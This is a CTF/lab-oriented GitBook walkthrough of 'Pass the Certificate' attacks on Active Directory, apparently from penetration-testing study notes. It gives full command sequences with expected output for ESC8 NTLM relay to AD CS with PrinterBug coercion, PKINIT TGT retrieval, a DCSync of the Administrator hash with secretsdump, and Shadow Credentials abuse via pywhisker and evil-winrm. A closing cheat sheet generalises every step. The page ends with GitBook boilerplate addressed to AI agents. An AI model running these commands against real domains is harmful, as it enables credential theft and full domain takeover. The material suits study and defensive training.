> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-certificate.md).

# Pass the Certificate

## Pass the Certificate

Use a certificate to request a Kerberos ticket without a password.

This usually starts with AD CS abuse or Shadow Credentials.

### Core ideas

| Term                     | Meaning                                                                     |
| ------------------------ | --------------------------------------------------------------------------- |
| **PKINIT**               | Kerberos extension that uses a certificate for AS-REQ authentication        |
| **Pass the Certificate** | Use a certificate to obtain a TGT, then continue with normal Kerberos abuse |
| **ESC8**                 | NTLM relay to the AD CS web enrollment endpoint                             |
| **Shadow Credentials**   | Add your public key to a victim's `msDS-KeyCredentialLink` attribute        |

***

### Attack path 1 — ESC8

#### Flow

```
ntlmrelayx listening
    ↓
printerbug coerces DC01
    ↓
relay NTLM to /certsrv
    ↓
DC01$.pfx issued
    ↓
gettgtpkinit.py → /tmp/dc.ccache
    ↓
KRB5CCNAME → secretsdump → Administrator NTLM
```

#### Step 1 — Start NTLM relay

```bash
impacket-ntlmrelayx -t http://10.129.234.110/certsrv/certfnsh.asp \
  --adcs -smb2support --template KerberosAuthentication
```

{% hint style="info" %}
`--template` sets the certificate template. Enumerate valid templates with `certipy`.
{% endhint %}

#### Step 2 — Coerce DC authentication

```bash
python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"password"@10.129.234.109 10.10.16.12
```

This forces `DC01` to authenticate to the attacker.

This path needs the **Print Spooler** service enabled on the DC.

#### Step 3 — Confirm certificate issuance

Expected `ntlmrelayx` output:

```
[*] Authenticating against http://10.129.234.110 as INLANEFREIGHT/DC01$ SUCCEED
[*] GOT CERTIFICATE! ID 8
[*] Writing PKCS#12 certificate to ./DC01$.pfx
```

#### Step 4 — Set up PKINITtools

```bash
git clone https://github.com/dirkjanm/PKINITtools.git && cd PKINITtools
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
```

If you hit `Error detecting the version of libcrypto`, run:

```bash
pip3 install -I git+https://github.com/wbond/oscrypto.git
```

#### Step 5 — Convert the certificate into a TGT

```bash
python3 gettgtpkinit.py \
  -cert-pfx ../DC01\$.pfx \
  -dc-ip 10.129.234.109 \
  'inlanefreight.local/dc01$' /tmp/dc.ccache
```

#### Step 6 — DCSync as `DC01$`

```bash
export KRB5CCNAME=/tmp/dc.ccache

impacket-secretsdump -k -no-pass \
  -dc-ip 10.129.234.109 \
  -just-dc-user Administrator \
  'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
```

***

### Attack path 2 — Shadow Credentials

#### Flow

```
BloodHound shows AddKeyCredentialLink
    ↓
pywhisker adds our key to the victim
    ↓
.pfx file and password generated
    ↓
gettgtpkinit.py → victim.ccache
    ↓
KRB5CCNAME → evil-winrm or smbclient
```

#### Step 1 — Add a key credential to the victim

```bash
pywhisker --dc-ip 10.129.234.109 \
  -d INLANEFREIGHT.LOCAL \
  -u wwhite -p 'password' \
  --target jpinkman \
  --action add
```

Expected output:

```
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] PFX exportiert nach: eFUVVTPf.pfx
[i] Passwort für PFX: bmRH4LK7UwPrAOfvIx6W
```

Save the generated `.pfx` file and password.

#### Step 2 — Request a TGT as the victim

```bash
python3 gettgtpkinit.py \
  -cert-pfx ../eFUVVTPf.pfx \
  -pfx-pass 'bmRH4LK7UwPrAOfvIx6W' \
  -dc-ip 10.129.234.109 \
  INLANEFREIGHT.LOCAL/jpinkman /tmp/jpinkman.ccache
```

#### Step 3 — Load the ticket and authenticate

```bash
export KRB5CCNAME=/tmp/jpinkman.ccache
klist

# If the victim is in Remote Management Users
evil-winrm -i dc01.inlanefreight.local -r inlanefreight.local
```

***

### Fallback — no PKINIT support

If the KDC does not support the required EKU, use **PassTheCert**.

It authenticates over **LDAPS** with the certificate directly.

It can:

* change passwords
* grant DCSync rights

Tool:

[PassTheCert](https://github.com/AlmondOffSec/PassTheCert)

***

### Quick reference

```bash
# NTLM relay
impacket-ntlmrelayx -t http://<CA_IP>/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication
python3 printerbug.py DOMAIN/user:"pass"@<DC_IP> <ATTACKER_IP>

# PKINITtools setup
git clone https://github.com/dirkjanm/PKINITtools.git && cd PKINITtools
python3 -m venv .venv && source .venv/bin/activate
pip3 install -r requirements.txt
pip3 install -I git+https://github.com/wbond/oscrypto.git

# Certificate → TGT
python3 gettgtpkinit.py -cert-pfx <file.pfx> -dc-ip <DC_IP> 'DOMAIN/account$' /tmp/out.ccache
python3 gettgtpkinit.py -cert-pfx <file.pfx> -pfx-pass '<pass>' -dc-ip <DC_IP> DOMAIN/user /tmp/out.ccache

# Use the ticket
export KRB5CCNAME=/tmp/out.ccache
klist

# DCSync
impacket-secretsdump -k -no-pass -dc-ip <DC_IP> -just-dc-user Administrator 'DOMAIN/DC01$'@DC01.DOMAIN

# Shadow Credentials
pywhisker --dc-ip <DC_IP> -d DOMAIN -u <user> -p '<pass>' --target <victim> --action add

# Lateral movement
evil-winrm -i <host> -r <domain>
```

***

### Key takeaways

| Concept                  | Detail                                                               |
| ------------------------ | -------------------------------------------------------------------- |
| **PKINIT**               | Uses a certificate instead of a password for Kerberos authentication |
| **ESC8**                 | Relays NTLM to AD CS and issues a usable certificate                 |
| **Printer Bug**          | Coerces a machine account to authenticate to you                     |
| **Shadow Credentials**   | Writes a public key to `msDS-KeyCredentialLink`                      |
| **AddKeyCredentialLink** | BloodHound edge that shows write access to that attribute            |
| **pywhisker**            | Adds or removes key credentials from a target object                 |
| **gettgtpkinit.py**      | Turns a `.pfx` file into a usable `.ccache` ticket                   |
| **PassTheCert**          | Useful when PKINIT is unavailable                                    |


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-certificate.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
